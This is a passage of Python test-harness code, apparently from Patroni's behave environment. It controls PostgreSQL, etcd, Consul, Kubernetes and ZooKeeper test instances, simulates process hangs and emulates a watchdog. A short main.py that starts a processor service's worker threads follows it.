'postgres'}) self._replication = config['postgresql'].get('authentication', config['postgresql']).get('replication', {}) self._replication.update({'host': host, 'port': self.__PORT, 'database': 'postgres'}) return patroni_config_path def _connection(self): if not self._conn or self._conn.closed != 0: self._conn = psycopg2.connect(**self._connkwargs) self._conn.autocommit = True return self._conn def _cursor(self): if not self._curs or self._curs.closed or self._curs.connection.closed != 0: self._curs = self._connection().cursor() return self._curs def query(self, query, fail_ok=False): try: cursor = self._cursor() cursor.execute(query) return cursor except psycopg2.Error: if not fail_ok: raise def check_role_has_changed_to(self, new_role, timeout=10): bound_time = time.time() + timeout recovery_status = new_role != 'primary' while time.time() < bound_time: cur = self.query("SELECT pg_is_in_recovery()", fail_ok=True) if cur: row = cur.fetchone() if row and row[0] == recovery_status: return True time.sleep(1) return False def get_watchdog(self): return self.watchdog def _get_pid(self): try: pidfile = os.path.join(self._data_dir, 'postmaster.pid') if not os.path.exists(pidfile): return None return int(open(pidfile).readline().strip()) except Exception: return None def database_is_running(self): pid = self._get_pid() if not pid: return False try: os.kill(pid, 0) except OSError: return False return True def patroni_hang(self, timeout): hang = ProcessHang(self._handle.pid, timeout) self._closables.append(hang) hang.start() def checkpoint_hang(self, timeout): pid = self._get_pid() if not pid: return False proc = psutil.Process(pid) for child in proc.children(): if 'checkpoint' in child.cmdline()[0]: checkpointer = child break else: return False hang = ProcessHang(checkpointer.pid, timeout) self._closables.append(hang) hang.start() return True def cancel_background(self): for obj in self._closables: obj.close() self._closables = [] def terminate_backends(self): pid = self._get_pid() if not pid: return False proc = psutil.Process(pid) for p in proc.children(): if 'process' not in p.cmdline()[0]: p.terminate() @property def backup_source(self): return 'postgres://{username}:{password}@{host}:{port}/{database}'.format(**self._replication) def backup(self, dest='basebackup'): subprocess.call([PatroniPoolController.BACKUP_SCRIPT, '--walmethod=none', '--datadir=' + os.path.join(self._output_dir, dest), '--dbname=' + self.backup_source]) class ProcessHang(object): """A background thread implementing a cancelable process hang via SIGSTOP.""" def __init__(self, pid, timeout): self._cancelled = threading.Event() self._thread = threading.Thread(target=self.run) self.pid = pid self.timeout = timeout def start(self): self._thread.start() def run(self): os.kill(self.pid, signal.SIGSTOP) try: self._cancelled.wait(self.timeout) finally: os.kill(self.pid, signal.SIGCONT) def close(self): self._cancelled.set() self._thread.join() class AbstractDcsController(AbstractController): _CLUSTER_NODE = '/service/{0}' def __init__(self, context, mktemp=True): work_directory = mktemp and tempfile.mkdtemp() or None super(AbstractDcsController, self).__init__(context, self.name(), work_directory, context.pctl.output_dir) def _is_accessible(self): return self._is_running() def stop(self, kill=False, timeout=15): """ terminate process and wipe out the temp work directory, but only if we actually started it""" super(AbstractDcsController, self).stop(kill=kill, timeout=timeout) if self._work_directory: shutil.rmtree(self._work_directory) def path(self, key=None, scope='batman'): return self._CLUSTER_NODE.format(scope) + (key and '/' + key or '') @abc.abstractmethod def query(self, key, scope='batman'): """ query for a value of a given key """ @abc.abstractmethod def cleanup_service_tree(self): """ clean all contents stored in the tree used for the tests """ @classmethod def get_subclasses(cls): for subclass in cls.__subclasses__(): for subsubclass in subclass.get_subclasses(): yield subsubclass yield subclass @classmethod def name(cls): return cls.__name__[:-10].lower() class ConsulController(AbstractDcsController): def __init__(self, context): super(ConsulController, self).__init__(context) os.environ['PATRONI_CONSUL_HOST'] = 'localhost:8500' os.environ['PATRONI_CONSUL_REGISTER_SERVICE'] = 'on' self._client = consul.Consul() self._config_file = None def _start(self): self._config_file = self._work_directory + '.json' with open(self._config_file, 'wb') as f: f.write(b'{"session_ttl_min":"5s","server":true,"bootstrap":true,"advertise_addr":"127.0.0.1"}') return subprocess.Popen(['consul', 'agent', '-config-file', self._config_file, '-data-dir', self._work_directory], stdout=self._log, stderr=subprocess.STDOUT) def stop(self, kill=False, timeout=15): super(ConsulController, self).stop(kill=kill, timeout=timeout) if self._config_file: os.unlink(self._config_file) def _is_running(self): try: return bool(self._client.status.leader()) except Exception: return False def path(self, key=None, scope='batman'): return super(ConsulController, self).path(key, scope)[1:] def query(self, key, scope='batman'): _, value = self._client.kv.get(self.path(key, scope)) return value and value['Value'].decode('utf-8') def cleanup_service_tree(self): self._client.kv.delete(self.path(scope=''), recurse=True) def start(self, max_wait_limit=15): super(ConsulController, self).start(max_wait_limit) class EtcdController(AbstractDcsController): """ handles all etcd related tasks, used for the tests setup and cleanup """ def __init__(self, context): super(EtcdController, self).__init__(context) os.environ['PATRONI_ETCD_HOST'] = 'localhost:2379' self._client = etcd.Client(port=2379) def _start(self): return subprocess.Popen(["etcd", "--debug", "--data-dir", self._work_directory], stdout=self._log, stderr=subprocess.STDOUT) def query(self, key, scope='batman'): try: return self._client.get(self.path(key, scope)).value except etcd.EtcdKeyNotFound: return None def cleanup_service_tree(self): try: self._client.delete(self.path(scope=''), recursive=True) except (etcd.EtcdKeyNotFound, etcd.EtcdConnectionFailed): return except Exception as e: assert False, "exception when cleaning up etcd contents: {0}".format(e) def _is_running(self): # if etcd is running, but we didn't start it try: return bool(self._client.machines) except Exception: return False class KubernetesController(AbstractDcsController): def __init__(self, context): super(KubernetesController, self).__init__(context) self._namespace = 'default' self._labels = {"application": "patroni"} self._label_selector = ','.join('{0}={1}'.format(k, v) for k, v in self._labels.items()) os.environ['PATRONI_KUBERNETES_LABELS'] = json.dumps(self._labels) os.environ['PATRONI_KUBERNETES_USE_ENDPOINTS'] = 'true' from kubernetes import client as k8s_client, config as k8s_config k8s_config.load_kube_config(context='local') self._client = k8s_client self._api = self._client.CoreV1Api() def _start(self): pass def create_pod(self, name, scope): labels = self._labels.copy() labels['cluster-name'] = scope metadata = self._client.V1ObjectMeta(namespace=self._namespace, name=name, labels=labels) spec = self._client.V1PodSpec(containers=[self._client.V1Container(name=name, image='empty')]) body = self._client.V1Pod(metadata=metadata, spec=spec) self._api.create_namespaced_pod(self._namespace, body) def delete_pod(self, name): try: self._api.delete_namespaced_pod(name, self._namespace, self._client.V1DeleteOptions()) except: pass while True: try: self._api.read_namespaced_pod(name, self._namespace) except: break def query(self, key, scope='batman'): if key.startswith('members/'): pod = self._api.read_namespaced_pod(key[8:], self._namespace) return (pod.metadata.annotations or {}).get('status', '') else: try: e = self._api.read_namespaced_endpoints(scope + ('' if key == 'leader' else '-' + key), self._namespace) if key == 'leader': return e.metadata.annotations[key] else: return json.dumps(e.metadata.annotations) except: return None def cleanup_service_tree(self): try: self._api.delete_collection_namespaced_pod(self._namespace, label_selector=self._label_selector) except: pass try: self._api.delete_collection_namespaced_endpoints(self._namespace, label_selector=self._label_selector) except: pass while True: result = self._api.list_namespaced_pod(self._namespace, label_selector=self._label_selector) if len(result.items) < 1: break def _is_running(self): return True class ZooKeeperController(AbstractDcsController): """ handles all zookeeper related tasks, used for the tests setup and cleanup """ def __init__(self, context, export_env=True): super(ZooKeeperController, self).__init__(context, False) if export_env: os.environ['PATRONI_ZOOKEEPER_HOSTS'] = "'localhost:2181'" self._client = kazoo.client.KazooClient() def _start(self): pass # TODO: implement later def query(self, key, scope='batman'): try: return self._client.get(self.path(key, scope))[0].decode('utf-8') except kazoo.exceptions.NoNodeError: return None def cleanup_service_tree(self): try: self._client.delete(self.path(scope=''), recursive=True) except (kazoo.exceptions.NoNodeError): return except Exception as e: assert False, "exception when cleaning up zookeeper contents: {0}".format(e) def _is_running(self): # if zookeeper is running, but we didn't start it if self._client.connected: return True try: return self._client.start(1) or True except Exception: return False class ExhibitorController(ZooKeeperController): def __init__(self, context): super(ExhibitorController, self).__init__(context, False) os.environ.update({'PATRONI_EXHIBITOR_HOSTS': 'localhost', 'PATRONI_EXHIBITOR_PORT': '8181'}) class PatroniPoolController(object): BACKUP_SCRIPT = 'features/backup_create.sh' def __init__(self, context): self._context = context self._dcs = None self._output_dir = None self._patroni_path = None self._processes = {} self.create_and_set_output_directory('') self.known_dcs = {subclass.name(): subclass for subclass in AbstractDcsController.get_subclasses()} @property def patroni_path(self): if self._patroni_path is None: cwd = os.path.realpath(__file__) while True: cwd, entry = os.path.split(cwd) if entry == 'features' or cwd == '/': break self._patroni_path = cwd return self._patroni_path @property def output_dir(self): return self._output_dir def start(self, name, max_wait_limit=20, custom_config=None): if name not in self._processes: self._processes[name] = PatroniController(self._context, name, self.patroni_path, self._output_dir, custom_config) self._processes[name].start(max_wait_limit) def __getattr__(self, func): if func not in ['stop', 'query', 'write_label', 'read_label', 'check_role_has_changed_to', 'add_tag_to_config', 'get_watchdog', 'database_is_running', 'checkpoint_hang', 'patroni_hang', 'terminate_backends', 'backup']: raise AttributeError("PatroniPoolController instance has no attribute '{0}'".format(func)) def wrapper(name, *args, **kwargs): return getattr(self._processes[name], func)(*args, **kwargs) return wrapper def stop_all(self): for ctl in self._processes.values(): ctl.cancel_background() ctl.stop() self._processes.clear() def create_and_set_output_directory(self, feature_name): feature_dir = os.path.join(self.patroni_path, 'features/output', feature_name.replace(' ', '_')) if os.path.exists(feature_dir): shutil.rmtree(feature_dir) os.makedirs(feature_dir) self._output_dir = feature_dir def clone(self, from_name, cluster_name, to_name): f = self._processes[from_name] custom_config = { 'scope': cluster_name, 'bootstrap': { 'method': 'pg_basebackup', 'pg_basebackup': { 'command': self.BACKUP_SCRIPT + ' --walmethod=stream --dbname=' + f.backup_source }, 'dcs': { 'postgresql': { 'parameters': { 'max_connections': 101 } } } }, 'postgresql': { 'parameters': { 'archive_mode': 'on', 'archive_command': 'mkdir -p {0} && test ! -f {0}/%f && cp %p {0}/%f'.format( os.path.join(self._output_dir, 'wal_archive')) }, 'authentication': { 'superuser': {'password': 'zalando1'}, 'replication': {'password': 'rep-pass1'} } } } self.start(to_name, custom_config=custom_config) def bootstrap_from_backup(self, name, cluster_name): custom_config = { 'scope': cluster_name, 'bootstrap': { 'method': 'backup_restore', 'backup_restore': { 'command': 'features/backup_restore.sh --sourcedir=' + os.path.join(self._output_dir, 'basebackup'), 'recovery_conf': { 'recovery_target_action': 'promote', 'recovery_target_timeline': 'latest', 'restore_command': 'cp {0}/wal_archive/%f %p'.format(self._output_dir) } } }, 'postgresql': { 'authentication': { 'superuser': {'password': 'zalando2'}, 'replication': {'password': 'rep-pass2'} } } } self.start(name, custom_config=custom_config) @property def dcs(self): if self._dcs is None: self._dcs = os.environ.pop('DCS', 'etcd') assert self._dcs in self.known_dcs, 'Unsupported dcs: ' + self._dcs return self._dcs class WatchdogMonitor(object): """Testing harness for emulating a watchdog device as a named pipe. Because we can't easily emulate ioctl's we require a custom driver on Patroni side. The device takes no action, only notes if it was pinged and/or triggered. """ def __init__(self, name, work_directory, output_dir): self.fifo_path = os.path.join(work_directory, 'data', 'watchdog.{0}.fifo'.format(name)) self.fifo_file = None self._stop_requested = False # Relying on bool setting being atomic self._thread = None self.last_ping = None self.was_pinged = False self.was_closed = False self._was_triggered = False self.timeout = 60 self._log_file = open(os.path.join(output_dir, 'watchdog.{0}.log'.format(name)), 'w') self._log("watchdog {0} initialized".format(name)) def _log(self, msg): tstamp = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S,%f") self._log_file.write("{0}: {1}\n".format(tstamp, msg)) def start(self): assert self._thread is None self._stop_requested = False self._log("starting fifo {0}".format(self.fifo_path)) fifo_dir = os.path.dirname(self.fifo_path) if os.path.exists(self.fifo_path): os.unlink(self.fifo_path) elif not os.path.exists(fifo_dir): os.mkdir(fifo_dir) os.mkfifo(self.fifo_path) self.last_ping = time.time() self._thread = threading.Thread(target=self.run) self._thread.start() def run(self): try: while not self._stop_requested: self._log("opening") self.fifo_file = os.open(self.fifo_path, os.O_RDONLY) try: self._log("Fifo {0} connected".format(self.fifo_path)) self.was_closed = False while not self._stop_requested: c = os.read(self.fifo_file, 1) if c == b'X': self._log("Stop requested") return elif c == b'': self._log("Pipe closed") break elif c == b'C': command = b'' c = os.read(self.fifo_file, 1) while c != b'\n' and c != b'': command += c c = os.read(self.fifo_file, 1) command = command.decode('utf8') if command.startswith('timeout='): self.timeout = int(command.split('=')[1]) self._log("timeout={0}".format(self.timeout)) elif c in [b'V', b'1']: cur_time = time.time() if cur_time - self.last_ping > self.timeout: self._log("Triggered") self._was_triggered = True if c == b'V': self._log("magic close") self.was_closed = True elif c == b'1': self.was_pinged = True self._log("ping after {0} seconds".format(cur_time - (self.last_ping or cur_time))) self.last_ping = cur_time else: self._log('Unknown command {0} received from fifo'.format(c)) finally: self.was_closed = True self._log("closing") os.close(self.fifo_file) except Exception as e: self._log("Error {0}".format(e)) finally: self._log("stopping") self._log_file.flush() if os.path.exists(self.fifo_path): os.unlink(self.fifo_path) def stop(self): self._log("Monitor stop") self._stop_requested = True try: if os.path.exists(self.fifo_path): fd = os.open(self.fifo_path, os.O_WRONLY) os.write(fd, b'X') os.close(fd) except Exception as e: self._log("err while closing: {0}".format(str(e))) if self._thread: self._thread.join() self._thread = None def reset(self): self._log("reset") self.was_pinged = self.was_closed = self._was_triggered = False @property def was_triggered(self): delta = time.time() - self.last_ping triggered = self._was_triggered or not self.was_closed and delta > self.timeout self._log("triggered={0}, {1}s left".format(triggered, self.timeout - delta)) return triggered # actions to execute on start/stop of the tests and before running invidual features def before_all(context): os.environ.update({'PATRONI_RESTAPI_USERNAME': 'username', 'PATRONI_RESTAPI_PASSWORD': 'password'}) context.ci = 'TRAVIS_BUILD_NUMBER' in os.environ or 'BUILD_NUMBER' in os.environ context.timeout_multiplier = 2 if context.ci else 1 context.pctl = PatroniPoolController(context) context.dcs_ctl = context.pctl.known_dcs[context.pctl.dcs](context) context.dcs_ctl.start() try: context.dcs_ctl.cleanup_service_tree() except AssertionError: # after_all handlers won't be executed in before_all context.dcs_ctl.stop() raise def after_all(context): context.dcs_ctl.stop() subprocess.call(['coverage', 'combine']) subprocess.call(['coverage', 'report']) def before_feature(context, feature): """ create per-feature output directory to collect Patroni and PostgreSQL logs """ context.pctl.create_and_set_output_directory(feature.name) def after_feature(context, feature): """ stop all Patronis, remove their data directory and cleanup the keys in etcd """ context.pctl.stop_all() shutil.rmtree(os.path.join(context.pctl.patroni_path, 'data')) context.dcs_ctl.cleanup_service_tree()
main.py
from ros.lib.cw_logging import commence_cw_log_streaming from ros.processor.inventory_events_consumer import InventoryEventsConsumer from ros.processor.insights_engine_result_consumer import InsightsEngineResultConsumer from ros.processor.garbage_collector import GarbageCollector from prometheus_client import start_http_server import threading from ros.lib.config import METRICS_PORT def process_engine_results(): processor = InsightsEngineResultConsumer() processor.run() def events_processor(): processor = InventoryEventsConsumer() processor.run() def garbage_collector(): collector = GarbageCollector() collector.run() if __name__ == "__main__": commence_cw_log_streaming('ros-processor') # Start processing in 2 different threads engine_results = threading.Thread(name='process-engine-results', target=process_engine_results) events = threading.Thread(name='events-processor', target=events_processor) collector = threading.Thread(name='garbage-collector', target=garbage_collector) events.start() engine_results.start() collector.start() start_http_server(int(METRICS_PORT)) # Wait for threads to finish events.join() engine_results.join() collector.join()